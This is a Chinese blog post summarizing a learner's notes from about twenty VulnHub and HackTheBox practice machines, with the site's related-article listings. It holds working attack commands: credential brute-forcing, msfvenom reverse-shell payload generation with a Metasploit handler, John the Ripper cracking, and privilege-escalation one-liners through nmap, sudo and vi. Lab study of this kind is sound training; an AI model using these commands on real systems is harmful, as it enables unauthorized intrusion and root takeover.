20台靶机小结(vulnhub和HTB)

最新推荐文章于 2024-05-13 11:46:19 发布
最新推荐文章于 2024-05-13 11:46:19 发布
阅读量675 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46128614/article/details/104319909
版权

稀里糊涂就做了20台靶机了,从一开始的小白到现在稍微有一点感觉,觉得自己进步了一点,总的来说还是很菜。由于基础差,对linux和windows机制不太熟悉,很多靶机都是照着师傅们的wp做出来的。做靶机和打CTF还是有差别,记录其中的一些脑洞和操作。

一、信息收集

1.在整个渗透过程中,收集到的账号密码全部保存为user.txtpass.txt,遇到有需要账号认证的地方(ssh、后台、数据库、FTP等等)就爆破一下,说不定拿着后台账号密码就进了ssh
2.nmap查看各种服务版本,然后在Exploit Database上查看是否有对应版本的漏洞,有RCE就能直接拿到shell;
如果没有扫到22端口,可能是受了knockd限制,后面的渗透过程中,找机会查看一下knockd.conf
3.目录扫描后台,dirb、dirsearch、dirbuster
4.模糊测试 wufzz用法
wfuzz -c -w /root/wordlist/common.txt --hc 404 x.x.x.x/\FUZZ\/1.php
-w 字典
模糊测试的部分用\FUZZ\代替
5.wordpress站用wpscan扫描,没有漏洞也可以收集用户名
wpscan -u http://xx.com -e u 枚举用户

二、进入网站后台后的操作

1.如果是通过密码进的后台,一定去ssh尝试一下说不定root都给你拿了
2.寻找编辑PHP、aspx的地方,写个shell进去,直接nc弹或者用msf的反弹shell(msf的meterpreter真的很好用)
3.知名度高的CMS(如wordpress、Drupal等等)查看一下插件组件的版本,然后搜索一下漏洞库有无对应RCE
4.找上传点传一个shell上去

三、继续提权的操作(已经获取www或者user权限)

1.查看数据库密码 ,加入pass.txt
2.查看/etc/passwd,把nologin结尾的用户删掉,其余加入user.txt
3.查看内核版本,内核提权
uname -a
lsb_release -a
4.查看备份文件和邮箱 /etc/mail /var/mail ,邮箱里可能有某个用户的密码,或者crontab定期执行脚本,home下可能有隐藏文件一定要用ls -al查看,里面可能有备忘录
5.sudo -l查看当前用户可以执行其他用户的权限的系统命令
6.上传LinEnum.sh脚本,查看有无存在提权漏洞的软件,如exim4 4.87-4.91和screen-4.5.0,或者可以执行root权限的命令nmap,python,find -exec等等
7.如果是用的meterpreter,输入background挂起当前session,然后可以在这个session的基础上运行一个suggester,扫描出来的漏洞能够精确到利用脚本,非常方便

四、一些工具的用法
1.msf反弹shell
msfvenom -f raw -p php/meterpreter/reverse_tcp -o shell.php LHOST= LPORT=
-f 格式 PHP的就是raw,asp 的就是asp 。–list formats 查看所有formats
-p payloads php环境下就用php/meterpreter/reverse_tcp,windows环境下用windows/meterpreter/reverse_tcp
msfconsole
use exploit/multi/handler
set payload= php/meterpreter/reverse_tcp 一定要使用正确的payload
set LHOST=
set LPORT=
run
2.john爆破hash
john --wordlist=/root/wordlist/passwd.txt hash.txt
john --show hash.txt
如果拿到了私钥,也可以用john爆破
python3 /usr/share/john/ssh2john.py id_rsa >hash.txt
john --wordlist=Wordlist/rockyou.txt hash.txt
3.nmap提权
在低版本的nmap里有–interactive可以进入交互界面,然后输入!sh返回一个shell
高版本的使用–script=root.nse
echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse
4.drush
drush是一个drupal的命令行管理软件 可以用drush重置后台密码
drush user-password admin --password='pass'
必须在web目录下/var/www/html
5.vi 提权
多用在当前shell受限制情况下,或者有root执行vi的机会
vi
:set shell=/bin/sh
:shell
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
6.redis提权
见我的另一篇博客
从安装Redis练习常规姿势 到HTB实战 postman userflag

「已注销」
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2042
超级详细的步骤,希望可以为你解决这靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 8865
Vulnhub它是一个提供各种网络攻防靶场的平,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
vulnhub靶机:Empire: Breakout
最新发布
weixin_69670995的博客
05-13 826
发现它是可以读取任意的文件,但是不知道/root目录下有什么文件,到着没有思路了,查看网上资料在/var/ backups目录下面有一个.old_pass.bak文件,我们使用tar去查看一下这文件里的内容(先将.old_pass.bak文件进行压缩到家目录下,然后解压到家目录下,使用cat命令查看文件)试了很多次,发现不让输入密码,这就很无语,报"Authentication failure"错误,我知道的报这个错误的原因是密码输入错误或者是root没有设置密码,尝试一下反弹shell吧。
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 1945
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
Vulnhub系列靶机-THM-ContainMe-v4
来日可期的博客
09-16 1191
详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。发现我们拼接的参数执行了,试着查看etc下的passwd文件。:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1
Aluxian_的博客
03-22 2856
vulnhub是个提供各种漏洞平的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机的类型也是第一次做,比较简单。2.smb共享 smbmap枚举(工具得使用)ssh私钥登入3.脏牛提权提权希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
HTB WP】Vaccine
Pz_mstr's Blog
02-23 704
前言 Hack the box - Vaccine WP 原文用onenote写的,懒得搬运了,凑合看吧 这几天试了一下HTB,感觉挺好玩的,属于是kail熟悉练习了 小知识记录 这次用到了zip2john、john和sudo -l,记录一下 zip2john 这东西原理是啥?有源代码的,不过懒得看了,作用是提取加密压缩包哈希信息 john 提取到压缩包哈希信息后,使用 sudo john passwd.hash 进行爆破(应该是有个内置密码本) sudo -l 即sudo --list 可以列出当前用户
vulnhub靶机:FunBox
Keepb1ue的博客
09-28 2997
靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 靶机:DC1 (VirtualBox) IP:192.168.56.109 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有也有详细的靶机说明,而FunBox需要寻找的flag总数为1个。 靶机环境配置: 将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。 靶机渗透开始: 先看下手里的
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 510
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
Vulnhub靶机实战-NARAK
黑白的博客
01-18 981
声明 好好学习,天天向上 搭建 用vmware打开,都调成NAT或者都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.52 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.31.52 看了首页,看见了地狱一样,不禁让我想起了最近的电视剧《风声》里面的地狱变 扫目录吧 python3 dirsearch.py -u 192.168.31.52 开的目录不是很多 使用
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-6
Aluxian_的博客
03-20 2034
Vulnhub靶机driftingblues6_vh渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:开始目录爆破:③:暴力破解zip:③:上传WebShell:④:脏牛提权:⑤:获取flag:Vulnhub靶机渗透总结: Vulnhub靶机介绍: Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/ Vulnhub靶机漏洞详解: ①:信息收集: kali里使用net
vulnhub渗透测试靶机prime-1
weixin_46128614的博客
01-19 1177
靶机下载地址https://www.vulnhub.com/entry/prime-1,358/ nmap -sS -sV -p- -T5 发现只开了22和80那就从80入手吧 浏览器访问 主页除了一张图片啥都没有 dirb扫描目录发现了/wordpress目录和一些其他的页面 其中的image.php,secret.txt都不是默认字典有的,问了几个师傅,说做多了就有经验了,关键字典要自己...
VulnHub靶机-SkyTower
Slow_的博客
02-26 637
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值